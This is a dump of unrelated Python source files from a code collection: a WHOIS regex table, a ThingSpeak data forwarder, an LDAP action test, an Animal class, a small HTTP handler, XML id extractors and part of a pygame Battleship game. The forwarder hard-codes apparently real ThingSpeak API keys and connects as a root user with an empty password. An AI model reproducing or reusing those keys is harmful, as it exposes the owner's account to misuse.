        'domain_name': r'domain:\s?(.+)',
        'registrar': 'nic.br',
        'registrant': None,
        'owner': r'owner:\s?(.+)',
        'creation_date': r'created:\s?(.+)',
        'expiration_date': r'expires:\s?(.+)',
        'updated_date': r'changed:\s?(.+)',
        'name_servers': r'nserver:\s*(.+)',
        'status': r'status:\s?(.+)',
    },
    'ma': {
        'extend': 'com',
        'registrar': r'Registrar:\s?(.+)',
        'registrant': r'Registrant Name:\s?(.+)',
        'expiration_date': r'\nRegistry Expiry Date:\s?(.+)',
        'status': r'Domain Status:\s?(.+)',
    },
    'tv': {
        'extend': 'com',
        'expiration_date': r'Registry Expiry Date:\s?(.+)',
    },
    'in': {
        'extend': 'com',
        'creation_date': r'Created On:\s*(.+)\s*',
        'updated_date': r'Last Updated On:\s*(.+)\s*',
    },
    'qa': {
        'extend': 'com',
        'updated_date': r'Last Modified:\s+(.*)\n',
    },
    'om': {
        'extend': 'qa',
    },
    'ir': {
        'extend': 'br',
        'domain_name': r'domain:\s?(.+)',
        'creation_date': None,
        'expiration_date': r'expire-date:\s?(.+)',
        'updated_date': r'last-updated:\s?(.+)',
    },
    'tw': {
        'extend': 'com',
        'creation_date': r'Record created on (.+) \(YYYY-MM-DD\)',
        'expiration_date': r'Record expires on (.+) \(YYYY-MM-DD\)',
    },
    'hk': {
        'extend': 'com',
        'creation_date': r'Domain Name Commencement Date:\s?(.+)',
        'expiration_date': r'Expiry Date:\s?(.+)\s*',
    },
    'th': {
        'extend': 'com',
        'domain_name': r'Domain:\s*(.+)\s*',
        'creation_date': r'Created date:\s*(.+)\s*',
        'expiration_date': r'Exp date:\s*(.+)\s*',
        'updated_date': r'Updated date:\s*(.+)\s*',
    },
    'tr': {
        'extend': 'com',
        'creation_date': r'Created on\.+:\s*(.+)\.',
        'expiration_date': r'Expires on\.+:\s*(.+)\.',
    },
    'mx': {
        'extend': 'com',
        'creation_date': r'Created On:\s*(.+)\s*',
        'updated_date': r'Last Updated On:\s*(.+)\s*',
    },
    'ch': {
        'extend': 'com',
        'creation_date': r'First registration date:\s*(.+)\s*',
        'name_servers': r'Name servers:\s*(.+)(?:\s*(.+)(?:\s*(.+)(?:\s*(.+)(?:\s*(.+))?)?)?)?',
    },
    'dk': {
        'extend': 'com',
        'domain_name': r'Domain:\s*(.+)\s*',
        'creation_date': r'Registered:\s*(.+)\s*',
        'expiration_date': r'Expires:\s*(.+)\s*',
    },
    'fi': {
        'extend': 'com',
        'domain_name': r'domain\.+:\s*(.+)\s*',
        'creation_date': r'created\.+:\s*(.+)\s*',
        'expiration_date': r'expires\.+:\s*(.+)\s*',
        'updated_date': r'modified\.+:\s*(.+)\s*',
    },
    'cn': {
        'extend': 'com',
        'creation_date': r'Registration Time:\s*(.+)\s*',
        'expiration_date': r'Expiration Time:\s*(.+)\s*',
    },
    'rs': {
        'extend': 'com',
        'creation_date': r'Registration date:\s*(.+)\s*',
        'updated_date': r'Modification date:\s*(.+)\s*',
    },
    'sk': {
        'extend': 'cz',
        'creation_date': r'Created:\s*(.+)\s*',
        'expiration_date': r'Valid Until:\s*(.+)\s*',
        'updated_date': r'Updated:\s*(.+)\s*',
        'name_servers': r'Nameserver:\s*(.+)\s*',
    },
    'id': {
        'extend': 'com',
        'creation_date': r'Created On:(.+)\s*',
        'expiration_date': r'Expiration Date:(.+)\s*',
        'updated_date': r'Last Updated On:(.+)\s*',
    },
    'ua': {
        'extend': 'com',
        'domain_name': r'domain:\s*(.+)\s*',
        'creation_date': r'created:\s*(.+)\s*',
        'expiration_date': r'expires:\s*(.+)\s*',
        'updated_date': r'modified:\s*(.+)\s*',
    },
    'il': {
        'extend': 'com',
        'domain_name': r'domain:\s*(.+)\s*',
        'creation_date': r'validity:\s*(.+)\s*',
        'expiration_date': None,
        'updated_date': None,
        'name_servers': r'nserver:\s*(.+)',
    },
    'cl': {
        'extend': 'com',
        'domain_name': r'(.+):\s*',
        'creation_date': None,
        'expiration_date': r'\(Expiration date\):\s*(.+)\s*',
        'updated_date': None,
        'name_servers': r'\(Domain servers\):\s*(.+)(?:\s*\(\d+\.\d+\.\d+\.\d+\)\s*)?\s*(?:(.+)\s*)?',
    },
}
|
998,170 | a68e6cfcaeaaa3dc27788e9bd33e982691de41b4 | import pymysql
import datetime
from datetime import date, datetime, timedelta
import time
import urllib.request
import json
import urllib.parse
# Assumption: the `main` database is populated by the program on the main server
# SECURITY NOTE(review): ThingSpeak API keys are hard-coded below — rotate them
# and load them from configuration/environment instead.
write_api="ZK7J4CMO3WDQ7YTF"
read_api="C2LETLVY0NPLWBMT"
# Forwarder loop: repeatedly pull unsent rows (sent = 0) from the local DB,
# push them to ThingSpeak over HTTP, and mark them as sent on success.
while True:
    ### REQUESTING DATA FROM THE main SERVER DATABASE ###
    ## Data request succeeded ##
    try:
        # Fetch rows from the `main` database that have not yet been sent (sent = 0)
        # Open the `main` database
        # NOTE(review): empty root password on localhost — confirm dev-only.
        connection_main = pymysql.connect(host='localhost',database='client',user='root',password='')
        cursor_main=connection_main.cursor()
        # SQL collecting the required columns from tabeldata
        cursor_main.execute("select id, channel, created_at, field1, field2, field3, field4, field5, field6 from tabeldata where sent = 0;")
        connection_main.commit()
        ### RECEIVING DATA ###
        ## Data received successfully ##
        try:
            # Bind each row's columns to named variables
            for row in cursor_main.fetchall():
                idnya=str(row[0]) # row indices follow the SELECT column order
                channel=str(row[1])
                datetimeraw=row[2]
                # NOTE(review): this rebinds the name `datetime`, shadowing
                # the datetime module imported above.
                datetime=urllib.parse.quote(str(datetimeraw))
                datasatu=str(row[3])
                datadua=str(row[4])
                datatiga=str(row[5])
                dataempat=str(row[6])
                datalima=str(row[7])
                dataenam=str(row[8])
                entry_id=int(idnya)
                # Log the row that was fetched successfully
                print("Sukses merekues data tanggal %s untuk channel %s"%(datetimeraw, channel))
                # optional debug output
                print(channel, datetime, datasatu, datadua, datatiga, dataempat, datalima, dataenam)
                ### SENDING DATA TO THE main SERVER ###
                # Send the data via the HTTP API
                url = "https://api.thingspeak.com/update.json?api_key=%s&channel=2&created_at=%s&entry_id=%s&field1=%s&field2=%s&field3=%s&field4=%s&field5=%s&field6=%s"%(write_api, datetime, entry_id, datasatu, datadua, datatiga, dataempat, datalima, dataenam)
                conn = urllib.request.urlopen(url)
                ### READING THE main SERVER RESPONSE ###
                # Decode the JSON response body
                data = json.loads(conn.read().decode('UTF-8'))
                # Report the outcome
                if data != 0:
                    print("Sukses mengirim data tanggal %s channel %s"%(datetimeraw, channel))
                    ### UPDATING THE main SERVER DATABASE ###
                    # Mark the row as sent (sent = 1) in tabeldata
                    cursor_main.execute("""update tabeldata set sent = 1 where id = %(idnya)s""", {'idnya':idnya})
                    connection_main.commit()
                    ## Report the successful update ##
                    print("Database main server berhasil diupdate")
                else:
                    ## Report the failed send; the row stays marked unsent ##
                    print("Gagal mengirim ke main server, database main server tidak diupdate")
                # Separator between rows
                print("-----------------")
        ## Response failed (so no DB update happened) ##
        except urllib.error.HTTPError:
            # Log the failed transfer
            print("Gagal mengirim data, gagal tersambung ke main server. database tidak diupdate")
            pass
            # Separator
            print("-----------------")
        # Close the `main` connection
        connection_main.close()
    ## Data request failed ##
    except pymysql.OperationalError:
        print("Gagal rekues data, tidak dapat tersambung ke database main server")
        # Separator
        print("-----------------")
        pass
    ## Allow a keyboard interrupt to stop the loop ##
    except KeyboardInterrupt:
        break
998,171 | 4926f2ce9ccc62178c89d3f5e150d52b7ff4ed77 | from parameterized import parameterized
from unittest import TestCase, mock
from insightconnect_plugin_runtime.exceptions import PluginException
from komand_active_directory_ldap.actions.disable_users import DisableUsers
from komand_active_directory_ldap.actions.disable_users.schema import Input, Output
from common import MockConnection
from common import MockServer
from common import default_connector
class TestActionDisableUsers(TestCase):
    """Unit tests for the DisableUsers action against a mocked LDAP backend."""

    @parameterized.expand(
        [
            # (action input, expected output): a DN that cannot be resolved
            # lands in `failed` with an error message; a resolvable DN lands
            # in `completed`.
            (
                {Input.DISTINGUISHED_NAMES: ["CN=empty_search,DC=example,DC=com"]},
                {
                    Output.FAILED: [
                        {
                            "dn": "CN=empty_search,DC=example,DC=com",
                            "error": "An error occurred during plugin "
                            "execution!\n"
                            "\n"
                            "The DN "
                            "CN=empty_search,DC=example,DC=com was "
                            "not found. Please provide a valid DN "
                            "and try again.",
                        }
                    ],
                    Output.COMPLETED: [],
                },
            ),
            # Mixed input: one bad DN, one good DN.
            (
                {Input.DISTINGUISHED_NAMES: ["CN=empty_search,DC=example,DC=com", "CN=Users,DC=example," "DC=com"]},
                {
                    Output.FAILED: [
                        {
                            "dn": "CN=empty_search,DC=example,DC=com",
                            "error": "An error occurred during plugin "
                            "execution!\n"
                            "\n"
                            "The DN "
                            "CN=empty_search,DC=example,DC=com was "
                            "not found. Please provide a valid DN "
                            "and try again.",
                        }
                    ],
                    Output.COMPLETED: ["CN=Users,DC=example,DC=com"],
                },
            ),
            # Fully successful input.
            (
                {Input.DISTINGUISHED_NAMES: ["CN=Users,DC=example,DC=com"]},
                {
                    Output.FAILED: [],
                    Output.COMPLETED: ["CN=Users,DC=example,DC=com"],
                },
            ),
        ]
    )
    @mock.patch("ldap3.Server", mock.MagicMock(return_value=MockServer))
    @mock.patch("ldap3.Connection", mock.MagicMock(return_value=MockConnection()))
    @default_connector(action=DisableUsers())
    def test_disable_users(self, _input, expected, action):
        """Each parameterized case must produce the expected failed/completed split."""
        actual = action.run(_input)
        self.assertEqual(expected, actual)

    @default_connector(action=DisableUsers())
    def test_empty_input(self, action):
        """An empty DN list must raise a PluginException with guidance."""
        with self.assertRaises(PluginException) as context:
            action.run({Input.DISTINGUISHED_NAMES: []})
        self.assertEqual("Distinguished Names must contain at least one entry", context.exception.cause)
        self.assertEqual("Please enter one or more Distinguished Names", context.exception.assistance)
|
998,172 | c871061e07442d06cc50fed109e21d9fc60b856a | import flask
import pandas as pd
|
998,173 | 5748998a5a570edbe587c15d4dee854849d5c0d4 | import random
import json
class Animal(object):
    """A zoo animal with simple aging, feeding and mortality rules."""

    # An animal may start dying once it has lived past this fraction of its
    # species life expectancy.
    DEAD_RATIO = 0.8
    # Survival roll threshold used once DEAD_RATIO has been exceeded.
    DEAD_CHANCE_RATIO = 0.8
    # Life expectancy per species (ages are tracked in months).
    LIFE_EXPECTANCIES = {'Snake': 12,
                         'Horse': 30,
                         'Wolf': 25,
                         'Tiger': 24,
                         'Bear': 40
                         }
    # Typical adult weight per species, in kg.
    AVERAGE_WEIGHTS = {'Snake': 65,
                       'Horse': 280,
                       'Wolf': 60,
                       'Tiger': 180,
                       'Bear': 400}

    def __init__(self, species, name, age, gender, weight):
        self.species = species
        self.age = age
        self.name = name
        self.gender = gender
        self.weight = weight

    def can_eat(self):
        """Return True if the animal weighs more than its species average.

        Returns None (falsy) for an unknown species, preserving the original
        behavior.
        """
        if self.species in Animal.AVERAGE_WEIGHTS:
            return Animal.AVERAGE_WEIGHTS[self.species] < self.weight

    def grow(self):
        """Age by one month and gain 10% of body weight."""
        self.age += 1
        self.weight += self.weight * 0.1

    def eat(self):
        """Feed the animal: adds 0.5 kg, but only when can_eat() allows it."""
        if self.can_eat():
            self.weight += 0.5

    def chance_to_die(self):
        """Return age / life expectancy (None for an unknown species)."""
        if self.species in Animal.LIFE_EXPECTANCIES:
            return self.age / Animal.LIFE_EXPECTANCIES[self.species]

    def is_dead(self):
        """Randomly decide death once chance_to_die() exceeds DEAD_RATIO.

        NOTE: for an unknown species chance_to_die() is None and the
        comparison raises TypeError — preserved from the original.
        """
        if self.chance_to_die() > Animal.DEAD_RATIO:
            if random.random() > Animal.DEAD_CHANCE_RATIO:
                return True
        return False

    def __str__(self):
        return "{0}: {1} {2} months {3} kg".format(
            self.name,
            self.species,
            self.age,
            self.weight)

    def load_config(self, file_name):
        """Read *file_name* and return its parsed JSON content.

        Fixed: the original left the file handle open if json parsing
        raised; a context manager guarantees the handle is closed.
        """
        with open(file_name, 'r') as config:
            return json.loads(config.read())
# def jsonify(self, instance):
# fp = open('animals.json', 'a+')
# data = json.dumps(str(instance.__dict__), indent=4, sort_keys=True)
# fp.write(data)
# fp.close()
# a = Animal('Snake', 'Pesho', 12, 'male', 43)
# # print(a)
# # print(a.is_dead())
# data = a._load_config('config.json')
# print(eval(data['animals']))
|
998,174 | 535639656374abf2def5d4d91e1bf77756a36f83 | from http.server import BaseHTTPRequestHandler, HTTPServer
from postcrd import Postgres
import re
from json import dumps
class Handler(BaseHTTPRequestHandler):
    """Minimal HTML front-end over the Postgres helper: a list page and a
    per-record detail page."""

    def header(self):
        """Send a 200 response with headers.

        NOTE(review): the header name 'Content_type' (underscore) with an
        empty value is almost certainly meant to be 'Content-type' with a
        real MIME type such as 'text/html' — confirm before changing.
        """
        self.send_response(200)
        self.send_header('Content_type', '')
        self.end_headers()

    def do_GET(self):
        """Route GET requests: */index.html lists all DB rows;
        /<id>/ViewDetail/ renders a single record."""
        tbody = ''
        if self.path.endswith("index.html"):
            # NOTE(review): the template file handle `g` is never closed.
            g= open('html/index.html')
            e = ''
            data = Postgres().read_db()
            e += g.read()
            # Build one table row per DB row, plus a link to its detail page
            # (assumes row[0] is the record id — confirm against Postgres.read_db).
            for row in data:
                tbody += '<tr>'
                for field in row:
                    tbody += '<td>' + str(field) + '</td>'
                tbody += '<td><a href="/' + str(row[0]) +'/ViewDetail/">view</a></td>'
                tbody += '</tr>'
            # Substitute generated rows into the ##tbody## placeholder.
            index_html = re.sub(r'##tbody##', tbody, e)
            self.header()
            self.wfile.write(index_html.encode())
        elif self.path.split('/')[2]=='ViewDetail':
            # Path shape: /<id>/ViewDetail/ -> fetch one record by id.
            pid = self.path.split('/')[1]
            print(pid)
            data = Postgres().read_id(pid)
            print(data)
            e = ''
            # NOTE(review): this file handle is also never closed.
            e += open('html/view.html').read()
            # `data` is indexed by field name here (dict-like access).
            for field in data:
                tbody += '<td>' + str(data[field]) + '</td>'
            view_html = re.sub(r'##vbody##', tbody, e)
            self.header()
            self.wfile.write(view_html.encode())
def run(server_class=HTTPServer, handler_class=Handler):
    """Serve *handler_class* on all interfaces, port 8000, forever (blocking)."""
    server_address = ('',8000)
    httpd =server_class(server_address, handler_class)
    httpd.serve_forever()


if __name__=='__main__':
    run()
998,175 | be3e197df204b9f79ca548dd9f9014507c2f40cc | import make_registers
from lxml import etree
def extract_ecat_ids_sax(xml_file, ids_file):
    """Extract eCat identifiers from *xml_file* (via make_registers' SAX-based
    extractor) and write them, one per line, to *ids_file*.

    Also prints the number of identifiers found.
    """
    ids = make_registers.extract_ecat_ids(xml_file)
    print(len(ids))
    # Fixed: the original opened the output file without ever closing it;
    # use a context manager so the handle is flushed and released.
    with open(ids_file, 'w') as out:
        out.write('\n'.join(str(ecat_id) for ecat_id in ids))
def extract_ecat_ids_xpath(xml_file, ids_file):
    """Extract eCat identifiers with one XPath query and write them,
    sorted, one per line, to *ids_file*.

    The ids live under
    MD_Metadata/alternativeMetadataReference/CI_Citation/identifier/
    MD_Identifier/code/CharacterString (ISO 19115-3).
    """
    # Prefix -> URI map required by lxml for namespaced XPath.
    namespaces = {
        'mdb': 'http://standards.iso.org/iso/19115/-3/mdb/1.0',
        'cat': 'http://standards.iso.org/iso/19115/-3/cat/1.0',
        'cit': 'http://standards.iso.org/iso/19115/-3/cit/1.0',
        'gcx': 'http://standards.iso.org/iso/19115/-3/gcx/1.0',
        'gex': 'http://standards.iso.org/iso/19115/-3/gex/1.0',
        'lan': 'http://standards.iso.org/iso/19115/-3/lan/1.0',
        'srv': 'http://standards.iso.org/iso/19115/-3/srv/2.0',
        'mas': 'http://standards.iso.org/iso/19115/-3/mas/1.0',
        'mcc': 'http://standards.iso.org/iso/19115/-3/mcc/1.0',
        'mco': 'http://standards.iso.org/iso/19115/-3/mco/1.0',
        'mda': 'http://standards.iso.org/iso/19115/-3/mda/1.0',
        'mds': 'http://standards.iso.org/iso/19115/-3/mds/1.0',
        'mdt': 'http://standards.iso.org/iso/19115/-3/mdt/1.0',
        'mex': 'http://standards.iso.org/iso/19115/-3/mex/1.0',
        'mmi': 'http://standards.iso.org/iso/19115/-3/mmi/1.0',
        'mpc': 'http://standards.iso.org/iso/19115/-3/mpc/1.0',
        'mrc': 'http://standards.iso.org/iso/19115/-3/mrc/1.0',
        'mrd': 'http://standards.iso.org/iso/19115/-3/mrd/1.0',
        'mri': 'http://standards.iso.org/iso/19115/-3/mri/1.0',
        'mrl': 'http://standards.iso.org/iso/19115/-3/mrl/1.0',
        'mrs': 'http://standards.iso.org/iso/19115/-3/mrs/1.0',
        'msr': 'http://standards.iso.org/iso/19115/-3/msr/1.0',
        'mdq': 'http://standards.iso.org/iso/19157/-2/mdq/1.0',
        'mac': 'http://standards.iso.org/iso/19115/-3/mac/1.0',
        'gco': 'http://standards.iso.org/iso/19115/-3/gco/1.0',
        'gml': 'http://www.opengis.net/gml/3.2',
        'xlink': 'http://www.w3.org/1999/xlink',
        'geonet': 'http://www.fao.org/geonetwork'
    }
    r = etree.parse(xml_file)
    ids = r.xpath('//mdb:MD_Metadata/mdb:alternativeMetadataReference/cit:CI_Citation/cit:identifier/mcc:MD_Identifier/mcc:code/gco:CharacterString/text()',
                  namespaces=namespaces
                  )
    # Bug fix: the output file was opened without ever being closed.
    with open(ids_file, 'w') as out:
        out.write('\n'.join(str(x) for x in sorted(ids)))
    print(len(ids))
def count_records(xml_file):
    """Pretty-print the first ``mdb:identificationInfo`` element of the file.

    Bug fix: guarded ``records[0]`` — the original raised IndexError when
    the XPath matched nothing.
    """
    namespaces = {
        'mdb': 'http://standards.iso.org/iso/19115/-3/mdb/1.0',
        'cat': 'http://standards.iso.org/iso/19115/-3/cat/1.0',
        'cit': 'http://standards.iso.org/iso/19115/-3/cit/1.0',
        'gcx': 'http://standards.iso.org/iso/19115/-3/gcx/1.0',
        'gex': 'http://standards.iso.org/iso/19115/-3/gex/1.0',
        'lan': 'http://standards.iso.org/iso/19115/-3/lan/1.0',
        'srv': 'http://standards.iso.org/iso/19115/-3/srv/2.0',
        'mas': 'http://standards.iso.org/iso/19115/-3/mas/1.0',
        'mcc': 'http://standards.iso.org/iso/19115/-3/mcc/1.0',
        'mco': 'http://standards.iso.org/iso/19115/-3/mco/1.0',
        'mda': 'http://standards.iso.org/iso/19115/-3/mda/1.0',
        'mds': 'http://standards.iso.org/iso/19115/-3/mds/1.0',
        'mdt': 'http://standards.iso.org/iso/19115/-3/mdt/1.0',
        'mex': 'http://standards.iso.org/iso/19115/-3/mex/1.0',
        'mmi': 'http://standards.iso.org/iso/19115/-3/mmi/1.0',
        'mpc': 'http://standards.iso.org/iso/19115/-3/mpc/1.0',
        'mrc': 'http://standards.iso.org/iso/19115/-3/mrc/1.0',
        'mrd': 'http://standards.iso.org/iso/19115/-3/mrd/1.0',
        'mri': 'http://standards.iso.org/iso/19115/-3/mri/1.0',
        'mrl': 'http://standards.iso.org/iso/19115/-3/mrl/1.0',
        'mrs': 'http://standards.iso.org/iso/19115/-3/mrs/1.0',
        'msr': 'http://standards.iso.org/iso/19115/-3/msr/1.0',
        'mdq': 'http://standards.iso.org/iso/19157/-2/mdq/1.0',
        'mac': 'http://standards.iso.org/iso/19115/-3/mac/1.0',
        'gco': 'http://standards.iso.org/iso/19115/-3/gco/1.0',
        'gml': 'http://www.opengis.net/gml/3.2',
        'xlink': 'http://www.w3.org/1999/xlink',
        'geonet': 'http://www.fao.org/geonetwork'
    }
    r = etree.parse(xml_file)
    records = r.xpath('//mdb:MD_Metadata/mdb:identificationInfo',
                      namespaces=namespaces
                      )
    if records:
        print(etree.tostring(records[0], pretty_print=True).decode('utf-8'))
if __name__ == '__main__':
    # No CLI wiring yet; the functions above are called interactively.
    pass
|
998,176 | 532ba476ab24bc9431c082d2ebd25858ed75432c | #coding:utf-8
# Numbers and arithmetic (Python 2 print statements; LPTHW-style exercise).
print "I will now count my chickens:"
# Integer division: 30 / 6 == 5, so this prints 30.
print "Hens", 25 + 30 /6
# Operator precedence: 25 * 3 / 4 == 18, so 100 - 18 == 82.
print "Roosters",100-25 *3/4
print "Now I will count the eggs:"
# Mix of %, unary minus and integer division; evaluates to 7.
print 3 + 2 + 1 - 5 + 4 % 2 -1 /4 +6
print "It is true that 3 + 2 < 5 -7?"
print 3 +2 < 5-7
print "What is 3+2?", 3+2
print "What is 5-7?", 5-7
print "Oh, that's why it's False."
print "Is it greater?", 5>-2
print "Is it greater or equal?", 5>= -2
print "Is is less or equal?", 5 <= -2
|
998,177 | c87cc29197577fd631259beec521c4c82bec21c0 | import pygame,sqlite3,random
from pygame.constants import MOUSEBUTTONUP, MOUSEMOTION
pygame.init()
# Screen dimensions in pixels.
display_width=800
display_height=600
# Main window surface; every draw call targets this.
gameDisplay = pygame.display.set_mode((display_width,display_height))
FPS=60
# Board is Boardwidth x Boardheight tiles, each Tilesize px square.
Boardwidth=12
Boardheight=12
Tilesize=40
# Number of shots after which the game ends (see Check_Game_Over).
shots=5
# Top-left pixel of the board, centred with a 250 px right margin.
X = int((display_width - (Boardwidth * Tilesize) - (200 + 50)) / 2)
Y = int((display_height - (Boardheight * Tilesize)) / 2)
# RGB colour constants used throughout the UI.
Black = (0, 0, 0)
Red = (255, 0, 0)
Sky_Blue=(0,238,238)
Dark_Blue=(100,149,237)
Yellow=(255,255,0)
White=(255,255,255)
Blue=(0,0,255)
Dark_Red=(218,47,10)
light_Red=(251,127,100)
Dark_yellow=(227,207,87)
light_yellow=(255,185,15)
# Window caption and background images (loaded from the working directory).
pygame.display.set_caption("BattleShip Fight To the Win!!!")
PickBackground=pygame.image.load("open.jpg")
Background=pygame.image.load("sea.jpg")
# Clock used to cap the frame rate at FPS.
clock = pygame.time.Clock()
# Ship grid: 13 rows of 12 zeros; cells become 'battleship' in make_ships.
grid = []
for i in range(13):
    grid.append([0,0,0,0,0,0,0,0,0,0,0,0])
#make player class
class Player: #player class to save the info about the player
    """Mutable session state for the current player (colours, score, role)."""
    def __init__(self,color,name,ship_color,board_color,miss_color,score,stage,user,type=None):
        self.type=type              # colour-vision profile picked at startup
        self.color=color            # UI text/button colour
        self.name=name
        self.ship_color=ship_color  # colour drawn for a hit
        self.board_color=board_color
        self.miss_color=miss_color
        self.score=score
        self.stage=stage            # 0 = start screen, 1 = guest, 2 = admin
        self.user=user              # "guest" or "ADMIN"
        self.rename=0               # set to 1 once an admin has renamed
# Single global Player instance mutated by the whole UI.
player=Player(Black,"empty",Black,Black,Black,0,0,"empty") #global player
# SQLite database holding scores, player types and game counts.
conn = sqlite3.connect('BattleShip.db')
# Shared cursor used by every DB helper below.
c = conn.cursor()
def generate_default_tiles(default_value):
    """Return a fresh Boardwidth x Boardheight grid filled with *default_value*."""
    return [[default_value] * Boardheight for _ in range(Boardwidth)]
def run_game(): #9
    """Main gameplay loop: draw the board, track shots and score.

    Bug fix: the counter rect was taken from SHOTS_SURF instead of
    COUNTER_SURF, so the shot counter was positioned/sized by the wrong
    surface.
    """
    revealed_tiles = generate_default_tiles(False) #make fresh start
    make_ships() #make random ships
    mousex, mousey = 0, 0
    counter = [] #count hits and miss
    while True:
        # counter display (it needs to be here in order to refresh it)
        Smalltext = pygame.font.Font('freesansbold.ttf', 20)
        COUNTER_SURF = Smalltext.render(str(len(counter)), True, player.color)
        COUNTER_RECT = COUNTER_SURF.get_rect()  # was SHOTS_SURF.get_rect()
        COUNTER_RECT.topleft = (display_width - 680, display_height - 570)
        # end of the counter
        gameDisplay.blit(Background,(0,0))
        gameDisplay.blit(SHOTS_SURF, SHOTS_RECT)
        gameDisplay.blit(COUNTER_SURF, COUNTER_RECT)
        draw_board(grid,revealed_tiles)
        button("Quit",600,500,100,50,player.color,"quit")
        if Check_Game_Over(len(counter)):
            Game_over()
        mouse_clicked = False
        for event in pygame.event.get():
            #click on board
            if event.type == MOUSEBUTTONUP:
                mousex, mousey = event.pos
                mouse_clicked = True
            #follow Square
            elif event.type == MOUSEMOTION:
                mousex, mousey = event.pos
        tilex, tiley = get_tile_at_pixel(mousex, mousey)
        if tilex != None and tiley != None:
            if not revealed_tiles[tilex][tiley]:
                draw_highlight_tile(tilex, tiley)
            if not revealed_tiles[tilex][tiley] and mouse_clicked:
                revealed_tiles[tilex][tiley] = True
                counter.append((tilex, tiley))
                # +10 for a hit, +3 for a miss (original scoring, kept).
                if grid[tilex][tiley] =='battleship':
                    player.score=player.score+10
                if grid[tilex][tiley] !='battleship':
                    player.score=player.score+3
        Exit_check()
def main(miss_color): #8
    """Finalise colour selection, build the shared 'Shots:' label, start the game."""
    player.miss_color=miss_color
    # These surfaces are re-blitted every frame by run_game, hence global.
    global SHOTS_SURF,SHOTS_RECT,COUNTER_SURF,COUNTER_RECT
    gameDisplay.blit(Background,(0,0))
    Smalltext = pygame.font.Font('freesansbold.ttf', 20)
    SHOTS_SURF = Smalltext.render("Shots: ",True, player.color)
    SHOTS_RECT = SHOTS_SURF.get_rect()
    SHOTS_RECT.topleft = (display_width -750, display_height - 570)
    Exit_check()
    run_game()
def get_tile_at_pixel(x, y):
    """Map a pixel coordinate to its board tile, or (None, None) if off-board."""
    for col in range(Boardwidth):
        for row in range(Boardheight):
            tile_rect = pygame.Rect(col * Tilesize + X, row * Tilesize + Y,
                                    Tilesize, Tilesize)
            if tile_rect.collidepoint(x, y):
                return (col, row)
    return (None, None)
def draw_highlight_tile(x, y): #side function to show highlight follow the mouse
    """Draw a 4 px black outline around the tile under the mouse."""
    left, top = x * Tilesize + X , y * Tilesize + Y
    pygame.draw.rect(gameDisplay, Black,(left, top, Tilesize, Tilesize), 4)
def button(msg,x,y,w,h,color,action=None): #side function to make buttons
    """Draw a button and, when hovered+clicked, dispatch to the screen named
    by *action*.  Acts as the app's central navigation switch; for
    action=="color" it also records the chosen vision type in the DB."""
    mouse=pygame.mouse.get_pos()
    click=pygame.mouse.get_pressed()
    # Hovered: redraw (same colour) and check for a left-click.
    if x+w>mouse[0]>x and y+h>mouse[1]>y:
        pygame.draw.rect(gameDisplay,color, (x,y,w,h))
        if click[0]==1 and action!=None:#if click on button do
            if action=="back":
                User_Pick()
            # "back1" returns to the screen matching the player's stage.
            elif action=="back1" and player.stage==0:
                Start_Game(color)
            elif action=="back1" and player.stage==1:
                Guest_Menu()
            elif action=="back1" and player.stage==2:
                Admin_Menu()
            elif action=="renaming":
                Renaming()
            elif action=="quit":
                if Check_Exit(True):
                    pygame.quit()
                    quit()
            elif action=="color":
                # Record which colour-vision profile was picked, then proceed.
                c.execute('SELECT * FROM Type')
                data = c.fetchall()
                if msg=="Color1":
                    player.type="Deuteranope"
                    c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[0][1]+1 if player.type=="Deuteranope" else data[0][1],"Deuteranope"))
                if msg=="Color2":
                    player.type="Protanope"
                    c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[1][1]+1 if player.type=="Protanope" else data[1][1],"Protanope"))
                if msg=="Color3":
                    player.type="Tritanope"
                    c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[2][1]+1 if player.type=="Tritanope" else data[2][1],"Tritanope"))
                if msg=="Color4":
                    player.type="Normal Vision"
                    c.execute("UPDATE Type SET Number = ( ? ) WHERE Name = ( ? )",(data[3][1]+1 if player.type=="Normal Vision" else data[3][1],"Normal Vision"))
                Start_Game(color)
            elif Check_Logout(action):
                Start_Game(color)
            elif action=="Statistics":
                Statistics()
            elif action=="Type":
                Type()
            elif action=="Games":
                Games()
            elif Check_Get_in_touch(action):
                Get_in_touch()
            elif action=="guest":
                Guest_Login()
            elif action=="login":
                Admin_Login()
            elif action=="play":
                Pick_ships_color()
            # Colour-selection chain: ship -> board -> miss -> main().
            elif action=="ship":
                ship_color=Get_Ship_Color(color)
                Pick_Board_color(ship_color)
            elif action=="board":
                boar_color=Get_Board_Color(color)
                Pick_Miss_color(boar_color)
            elif action=="miss":
                miss_color=Get_Miss_Color(color)
                main(miss_color)
    else: #show the button
        pygame.draw.rect(gameDisplay, color, (x,y,w,h))
    Print(msg,Black,20,x+(w/2),y+(h/2))
def draw_board(board, revealed): #side function draw the board
    """Paint every tile: board colour if hidden, ship colour for a revealed
    hit, miss colour for a revealed miss."""
    for tilex in range(Boardwidth):
        for tiley in range(Boardheight):
            left = tilex * Tilesize + X
            top = tiley * Tilesize + Y
            if not revealed[tilex][tiley]: #if not click draw the board color
                pygame.draw.rect(gameDisplay, player.board_color, (left, top, Tilesize,Tilesize))
            else:
                if board[tilex][tiley] == 'battleship': #if click and hit draw the hit color
                    pygame.draw.rect(gameDisplay, player.ship_color, (left, top, Tilesize, Tilesize))
                else:
                    #if click and miss draw the miss color
                    pygame.draw.rect(gameDisplay, player.miss_color, (left, top, Tilesize, Tilesize))
def make_ships(): #side function make all the ships on the boards random
    """Place five ships (lengths 5,4,3,2,3) at random positions in `grid`.

    NOTE(review): placements are drawn independently, so ships can
    overlap each other — confirm this is intended.
    """
    row=random.randrange(0,8)
    col=random.randrange(0,2)
    #ship 1 (length 5, vertical within rows 0-12)
    for i in range(5):
        grid[col][row+i]='battleship'
    #ship 2 (length 4)
    row=random.randrange(0,9)
    col=random.randrange(2,5)
    for i in range(4):
        grid[col][row+i]='battleship'
    #ship 3 (length 3, laid across columns instead of rows)
    row=random.randrange(0,5)
    col=random.randrange(5,10)
    for i in range(3):
        grid[col+i][row]='battleship'
    #ship 4 (length 2)
    row=random.randrange(5,9)
    col=random.randrange(5,11)
    for i in range(2):
        grid[col][row+i]='battleship'
    #ship 5 (length 3)
    row=random.randrange(8,10)
    col=random.randrange(5,12)
    for i in range(3):
        grid[col][row+i]='battleship'
def create_tables():# create table in the data bsae
    """Create the three tables if missing and seed Type with the four
